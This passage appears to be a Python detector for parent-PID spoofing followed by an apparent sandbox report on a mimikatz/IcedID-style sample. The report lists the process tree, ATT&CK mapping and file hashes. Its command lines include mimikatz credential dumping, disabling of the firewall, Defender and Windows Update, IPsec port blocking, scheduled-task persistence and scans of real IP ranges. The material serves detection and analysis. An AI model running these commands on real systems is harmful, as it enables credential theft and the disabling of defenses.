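    child_pid: int
    child_image: str
    claimed_parent_pid: int
    claimed_parent_image: str
    likely_creator_pid: int
    likely_creator_image: str


def find_ppid_spoofing(accesses: Iterable[ProcessAccess],
                       creates: Iterable[ProcessCreate],
                       window: int = 60) -> List[Finding]:
    """One Finding per ProcessCreate whose recorded parent was opened with
    PROCESS_CREATE_PROCESS by a *different* process within `window` seconds
    before the create.  The most recent such opener is the likely creator."""
    accesses = list(accesses)
    findings: List[Finding] = []
    for c in creates:
        candidates = [a for a in accesses
                      if a.target_pid == c.parent_pid
                      and a.source_pid != c.parent_pid
                      and a.granted_access & PROCESS_CREATE_PROCESS
                      and 0 <= c.ts - a.ts <= window]
        if candidates:
            a = max(candidates, key=lambda x: x.ts)
            findings.append(Finding(c.pid, c.image, c.parent_pid, c.parent_image,
                                    a.source_pid, a.source_image))
    return findings


# Constructed telemetry modelled on the report's process tree.
SAMPLE_ACCESS = [
    # hypothetical Task Manager refresh: query-only access, must not trigger
    ProcessAccess(90, 5000, r"C:\Windows\System32\Taskmgr.exe",
                  2132, r"C:\Windows\System32\spoolsv.exe", 0x1000),
    # snutqkl.exe opens spoolsv.exe with full access, which includes 0x0080
    ProcessAccess(100, 3964, r"C:\Windows\fpibtvet\snutqkl.exe",
                  2132, r"C:\Windows\System32\spoolsv.exe", 0x1FFFFF),
]

SAMPLE_CREATE = [
    # ordinary creates: the parent in the record really is the creator
    ProcessCreate(50, 2720, r"C:\Windows\SysWOW64\cmd.exe", 4640,
                  r"C:\Users\Admin\AppData\Local\Temp\2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe"),
    ProcessCreate(51, 1184, r"C:\Windows\SysWOW64\PING.EXE",
                  2720, r"C:\Windows\SysWOW64\cmd.exe"),
    # the miner: recorded parent is spoolsv.exe, but snutqkl.exe opened it first
    ProcessCreate(102, 3980, r"C:\Windows\TEMP\letltzgie\jtpawa.exe",
                  2132, r"C:\Windows\System32\spoolsv.exe"),
]

if __name__ == "__main__":
    for f in find_ppid_spoofing(SAMPLE_ACCESS, SAMPLE_CREATE):
        print(f"{f.child_image} (PID {f.child_pid}) claims parent "
              f"{f.claimed_parent_image} (PID {f.claimed_parent_pid}); "
              f"likely created by {f.likely_creator_image} (PID {f.likely_creator_pid})")
```

Sysmon only emits ProcessAccess for targets its configuration includes, so a config that logs opens of lsass.exe alone would never see the spoolsv.exe open used here; add a rule keyed on GrantedAccess containing 0x80 regardless of target, or fall back to the Microsoft-Windows-Kernel-Process ProcessStart ETW event, whose header ProcessID is the true creator while its ParentProcessID field carries the spoofed value.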
Processes

C:\Windows\System32\spoolsv.exe  (PID 2132)
    C:\Windows\TEMP\letltzgie\jtpawa.exe  (PID 3980)
        cmdline: "C:\Windows\TEMP\letltzgie\jtpawa.exe"
        signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe  (PID 4640)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe"
    signatures: Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious behavior: RenamesItself; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe  (PID 2720)
        cmdline: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fpibtvet\snutqkl.exe
        signatures: System Network Configuration Discovery: Internet Connection Discovery; Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\PING.EXE  (PID 1184)
            cmdline: ping 127.0.0.1 -n 5
            signatures: System Network Configuration Discovery: Internet Connection Discovery; Runs ping.exe
        C:\Windows\fpibtvet\snutqkl.exe  (PID 4076)
            signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx

C:\Windows\fpibtvet\snutqkl.exe  (PID 3964)
    signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in Drivers directory; Event Triggered Execution: Image File Execution Options Injection; Executes dropped EXE; Drops file in System32 directory; Drops file in Windows directory; System Location Discovery: System Language Discovery; Modifies data under HKEY_USERS; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe  (PID 1300)
        cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe  (PID 4548)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  (PID 1804)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
        C:\Windows\SysWOW64\cmd.exe  (PID 976)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  (PID 60)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
        C:\Windows\SysWOW64\cmd.exe  (PID 3488)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  (PID 4504)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            signatures: System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 2044)
        cmdline: netsh ipsec static del all
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 4640)
        cmdline: netsh ipsec static add policy name=Bastards description=FuckingBastards
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 1264)
        cmdline: netsh ipsec static add filteraction name=BastardsList action=block
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 3396)
        cmdline: cmd /c C:\Windows\mtemsclch\taatftcev\wpcap.exe /S
        signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        C:\Windows\mtemsclch\taatftcev\wpcap.exe  (PID 1540)
            cmdline: C:\Windows\mtemsclch\taatftcev\wpcap.exe /S
            signatures: Drops file in Drivers directory; Executes dropped EXE; Loads dropped DLL; Drops file in System32 directory; Drops file in Program Files directory; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\net.exe  (PID 4332)
                cmdline: net stop "Boundary Meter"
                signatures: Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe  (PID 840)
                    cmdline: C:\Windows\system32\net1 stop "Boundary Meter"
                    signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net.exe  (PID 532)
                cmdline: net stop "TrueSight Meter"
                signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe  (PID 2324)
                    cmdline: C:\Windows\system32\net1 stop "TrueSight Meter"
                    signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net.exe  (PID 3128)
                cmdline: net stop npf
                signatures: Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe  (PID 3876)
                    cmdline: C:\Windows\system32\net1 stop npf
                    signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net.exe  (PID 1804)
                cmdline: net start npf
                signatures: System Location Discovery: System Language Discovery
                C:\Windows\SysWOW64\net1.exe  (PID 5028)
                    cmdline: C:\Windows\system32\net1 start npf
                    signatures: System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 4504)
        cmdline: cmd /c net start npf
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net.exe  (PID 1180)
            cmdline: net start npf
            signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net1.exe  (PID 3212)
                cmdline: C:\Windows\system32\net1 start npf
                signatures: System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 3928)
        cmdline: cmd /c net start npf
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net.exe  (PID 4212)
            cmdline: net start npf
            signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net1.exe  (PID 388)
                cmdline: C:\Windows\system32\net1 start npf
                signatures: System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 1552)
        cmdline: cmd /c C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt
        C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe  (PID 556)
            cmdline: C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt
            signatures: Executes dropped EXE; Loads dropped DLL
    C:\Windows\SysWOW64\cmd.exe  (PID 2172)
        cmdline: cmd /c C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mtemsclch\Corporate\log.txt
        signatures: Drops file in Windows directory; System Location Discovery: System Language Discovery
        C:\Windows\mtemsclch\Corporate\vfshost.exe  (PID 4392)
            cmdline: C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
            signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe  (PID 748)
        cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\cmd.exe  (PID 5016)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\schtasks.exe  (PID 4252)
            cmdline: schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"
            signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
    C:\Windows\SysWOW64\cmd.exe  (PID 1264)
        cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"
        C:\Windows\SysWOW64\cmd.exe  (PID 3312)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\schtasks.exe  (PID 3240)
            cmdline: schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"
            signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
    C:\Windows\SysWOW64\cmd.exe  (PID 3792)
        cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"
        C:\Windows\SysWOW64\cmd.exe  (PID 3624)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\schtasks.exe  (PID 3200)
            cmdline: schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"
            signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
    C:\Windows\SysWOW64\netsh.exe  (PID 1584)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 1120)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 2976)
        cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 2992)
        cmdline: netsh ipsec static set policy name=Bastards assign=y
        signatures: Event Triggered Execution: Netsh Helper DLL
    C:\Windows\SysWOW64\netsh.exe  (PID 3336)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 1996)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 4608)
        cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 3396)
        cmdline: netsh ipsec static set policy name=Bastards assign=y
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 1180)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
        signatures: Event Triggered Execution: Netsh Helper DLL
    C:\Windows\SysWOW64\netsh.exe  (PID 2236)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 2028)
        cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe  (PID 1568)
        cmdline: netsh ipsec static set policy name=Bastards assign=y
        signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 4552)
        cmdline: cmd /c net stop SharedAccess
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net.exe  (PID 4864)
            cmdline: net stop SharedAccess
            signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net1.exe  (PID 2052)
                cmdline: C:\Windows\system32\net1 stop SharedAccess
    C:\Windows\SysWOW64\cmd.exe  (PID 4668)
        cmdline: cmd /c netsh firewall set opmode mode=disable
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\netsh.exe  (PID 4012)
            cmdline: netsh firewall set opmode mode=disable
            signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 4772)
        cmdline: cmd /c netsh Advfirewall set allprofiles state off
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\netsh.exe  (PID 4576)
            cmdline: netsh Advfirewall set allprofiles state off
            signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL
    C:\Windows\TEMP\mtemsclch\iulpaulua.exe  (PID 2188)
        cmdline: C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 784 C:\Windows\TEMP\mtemsclch\784.dmp
        signatures: Executes dropped EXE; Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe  (PID 1888)
        cmdline: cmd /c net stop MpsSvc
        C:\Windows\SysWOW64\net.exe  (PID 3120)
            cmdline: net stop MpsSvc
            signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net1.exe  (PID 1616)
                cmdline: C:\Windows\system32\net1 stop MpsSvc
                signatures: System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 4204)
        cmdline: cmd /c net stop WinDefend
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net.exe  (PID 1120)
            cmdline: net stop WinDefend
            C:\Windows\SysWOW64\net1.exe  (PID 1128)
                cmdline: C:\Windows\system32\net1 stop WinDefend
    C:\Windows\SysWOW64\cmd.exe  (PID 1404)
        cmdline: cmd /c net stop wuauserv
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net.exe  (PID 1184)
            cmdline: net stop wuauserv
            signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\net1.exe  (PID 4396)
                cmdline: C:\Windows\system32\net1 stop wuauserv
                signatures: System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 1656)
        cmdline: cmd /c sc config MpsSvc start= disabled
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\sc.exe  (PID 4188)
            cmdline: sc config MpsSvc start= disabled
            signatures: Launches sc.exe
    C:\Windows\SysWOW64\cmd.exe  (PID 2532)
        cmdline: cmd /c sc config SharedAccess start= disabled
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\sc.exe  (PID 4876)
            cmdline: sc config SharedAccess start= disabled
            signatures: Launches sc.exe; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 708)
        cmdline: cmd /c sc config WinDefend start= disabled
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\sc.exe  (PID 2172)
            cmdline: sc config WinDefend start= disabled
            signatures: Launches sc.exe; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 2128)
        cmdline: cmd /c sc config wuauserv start= disabled
        signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\sc.exe  (PID 1848)
            cmdline: sc config wuauserv start= disabled
            signatures: Launches sc.exe; System Location Discovery: System Language Discovery
    C:\Windows\TEMP\xohudmc.exe  (PID 2528)
        signatures: Executes dropped EXE; Drops file in System32 directory; Suspicious use of SetWindowsHookEx
    C:\Windows\TEMP\mtemsclch\iulpaulua.exe  (16 further runs)
        cmdline: C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp <target> C:\Windows\TEMP\mtemsclch\<target>.dmp, one run per target PID, in order: 332 (PID 2544), 2132 (PID 768), 2596 (PID 4856), 2748 (PID 4360), 2836 (PID 2436), 3144 (PID 4620), 3816 (PID 4460), 3904 (PID 2456), 3972 (PID 4556), 4056 (PID 5080), 3496 (PID 3724), 4036 (PID 3620), 216 (PID 3228), 640 (PID 2844), 2584 (PID 3284), 2412 (PID 2052)
        signatures (each run): Executes dropped EXE; Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe  (PID 4708)
        cmdline: cmd.exe /c C:\Windows\mtemsclch\taatftcev\scan.b
        C:\Windows\mtemsclch\taatftcev\ngliteqrb.exe  (PID 1628)
            cmdline: ngliteqrb.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
            signatures: Executes dropped EXE; Drops file in Windows directory; System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe  (PID 5752)
        cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        C:\Windows\SysWOW64\cmd.exe  (PID 2380)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\cacls.exe  (PID 6124)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\cmd.exe  (PID 4428)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  (PID 3260)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\cmd.exe  (PID 180)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            signatures: System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\cacls.exe  (PID 5256)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            signatures: System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\nspfoo.exe  (PID 4844)
    signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE  (PID 3244)
    cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\snutqkl.exe
    C:\Windows\ime\snutqkl.exe  (PID 512)
        signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE  (PID 2496)
    cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F
    C:\Windows\system32\cmd.exe  (PID 3200)
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe  (PID 996)
        cmdline: cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F

C:\Windows\system32\cmd.EXE  (PID 436)
    cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F
    C:\Windows\system32\cmd.exe  (PID 2408)
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe  (PID 3036)
        cmdline: cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F

C:\Windows\system32\cmd.EXE  (PID 4144)
    cmdline: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\snutqkl.exe
    C:\Windows\ime\snutqkl.exe  (PID 6092)
        signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE  (PID 5724)
    cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F
    C:\Windows\system32\cmd.exe  (PID 4360)
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe  (PID 3744)
        cmdline: cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F

C:\Windows\system32\cmd.EXE  (PID 5324)
    cmdline: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F
    C:\Windows\system32\cmd.exe  (PID 5828)
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe  (PID 5648)
        cmdline: cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F
Network
MITRE ATT&CK Enterprise v15 (technique, count of matching behaviours)

Execution
  Scheduled Task/Job (1)
    Scheduled Task (1)
  System Services (1)
    Service Execution (1)

Persistence
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (2)
    Image File Execution Options Injection (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Privilege Escalation
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (2)
    Image File Execution Options Injection (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Discovery
  Network Service Discovery (2)
  Network Share Discovery (1)
  Query Registry (1)
  Remote System Discovery (1)
  System Information Discovery (1)
  System Location Discovery (1)
    System Language Discovery (1)
  System Network Configuration Discovery (1)
    Internet Connection Discovery (1)
Downloads

Filesize: 95KB
MD5: 86316be34481c1ed5b792169312673fd
SHA1: 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA256: 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA512: 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Filesize: 275KB
MD5: 4633b298d57014627831ccac89a2c50b
SHA1: e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256: b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA512: 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Filesize: 693B
MD5: f2d396833af4aea7b9afde89593ca56e
SHA1: 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256: d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA512: 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Filesize: 4.1MB
MD5: e9b91cd925a2c9e6c4df0b56985896e8
SHA1: 68ad8abc9b1f27edfc2c0053aa50ea8312192076
SHA256: 0af7aa30ebf336b567f9029197842ab86d01f9cf706c1cd5ba3e67c45338f329
SHA512: d1c61d64358f6e6d66e0dd1b1e6ce442fe578e9cf27ea9bcbec41d83be0ae9edc1d81cc7d64626fab5de6ea59b94186f8877faba20be22e8591392086be9099c

Filesize: 8.5MB
MD5: 6a29c7b81ff22527121e2bc5ea5bfb87
SHA1: 2eeb1feea2f9d67a2bc388e1999a162a3038575a
SHA256: 0725ac0629c44a262ddb51bd97e2e9c39267674e665bf4a7bd65b9772a3c831f
SHA512: 67a64656856b9120e5c9ede4bfff173adde79aecdf7c34c75e7098f57c3e5e8c90600001da67a635c7c75390b4683e1d2fe4d028703c49fb93d5228c5893105c

Filesize: 3.9MB
MD5: 759c6fe032d6d2eac7f526387916dab0
SHA1: d22da013736651316b5664cca80c2454748c99ec
SHA256: 66fca28fbeac09e9accf4f04419d38ee0b04a7f4af4b3b9f2b2522aa3d73c906
SHA512: bb510771d6da063ffbb2b7d8826a313c433022f736ae5dc1b7a1d1d4c808fbe3c469b255114d12350bb0bb8292c6368979aefa5f9fdc02581033198d041d9793

Filesize: 3.0MB
MD5: 84b5eb2b7a016148d5ff8e161d2a83bf
SHA1: 2bf7938888d8df3c412f25efc064a2aee0fb55db
SHA256: 77a20857d0937a06ce7bbba611eb55007ed8429891a25ce7e973f4e392247a35
SHA512: 97f763e8f6b934ae3b2d74880390621e63f8912711939e0bcd94aadd6f1a18065207bc29db2ee916ccc4654c799a05ca7e81a233135f5d80472b1f3ae1ef3294

Filesize: 7.5MB
MD5: 9671aa1c713eb8e42b8069a1a387b6f9
SHA1: 1b3c509bb7b32c0cd661d1f9c2306e54826b2a58
SHA256: c223055c236fa1a474aa8c49861e19a9e30ab43a5f5e97d9d73cfd5de789c0c5
SHA512: 906d55d1aa3fd01b97a84d78527a6cfa6cc1420ec27a1049dddbd7330befbf7cda7437029ac3a78e64c13b6d5a65658cb79839a560696d895cc6b841b559f26f

Filesize: 806KB
MD5: 12afcd9b39b633ec867b35117125cb07
SHA1: 24193b822118e02dab975239b9bb9d8e2d19454d
SHA256: 83cde9d5ded594b0dbb6d1bce29c5ef79211ce5c712ec2f06a995ded1b42b9a5
SHA512: 5bb8abd49deb2b1147f07ca8a3e7e6ab9d5d277254d37187477bfa41c0962f9cc30eabec27dd0d07d42c658e585def6e7e61e0d8302dfcc26ffc3abc7836b4b1

Filesize: 33.5MB
MD5: b6bed01794da676f9df2651629b972a8
SHA1: 3731c1d5ecfd560f3d7a9a9f10f126478ff94107
SHA256: 76580309ee05acaecb2f8bffff18f321721718e39d221b2fc5f8f3ea17a74114
SHA512: a7d4e7835b52c5d7f4171f8b7560d6857571009e6d2b36e8bfcad970e8bda6f348f2229ad7ecdd2ea22133b8cfc35d4fe4da821bce57803132b30b07315753c2

Filesize: 1.2MB
MD5: 9429a75bc337bbf52b67a932be49b9fa
SHA1: 343e23673e987f1bcbf2aa528a47f97fd9777e3c
SHA256: aa64c3b8d7ba1199f8734d27d440c7f261e9daec087aa287d852a90ce4527ba3
SHA512: 48a6b7dc9b85742605cb84105e6964655b66815a331497f0729be9ee458e632ff7c446cbed0845935c77b5c1b16b25a64b8c8c085bc1a8c1d7f425add01ff9f5

Filesize: 2.6MB
MD5: 8b5df548e635bf29568b7cb163dc678f
SHA1: 1fbb475fb9de111cf3731ff5cc637356ae7f11a4
SHA256: cb266965d62b0408134f41002fd04302a2b59b946826a3855c1b12de3b65a609
SHA512: 898c055864eb2af0fe250af1f421b013254a6ba53192acea2761d4230259479a649dffb272897985913f30e3620ad9fc527defd117fadc19eb4f89dfc93ed0b5

Filesize: 19.9MB
MD5: 5fabc470916636d13d652e3ec51f23e2
SHA1: d13bfc84b58ab4e4e99695a5870944d02dbab560
SHA256: 30a644fcc1fb0e56b1f3117068a018b3ebd221af1cb44fe856f58282dadfd8cb
SHA512: 171b0f9d22a0f2505912b3c77d5c64b4dafbbe22d9a5367004e464b1098fb4f04030b18723625a41ddd0a8e0fa0ba491de9560b50918cc31fc7188d577967de7

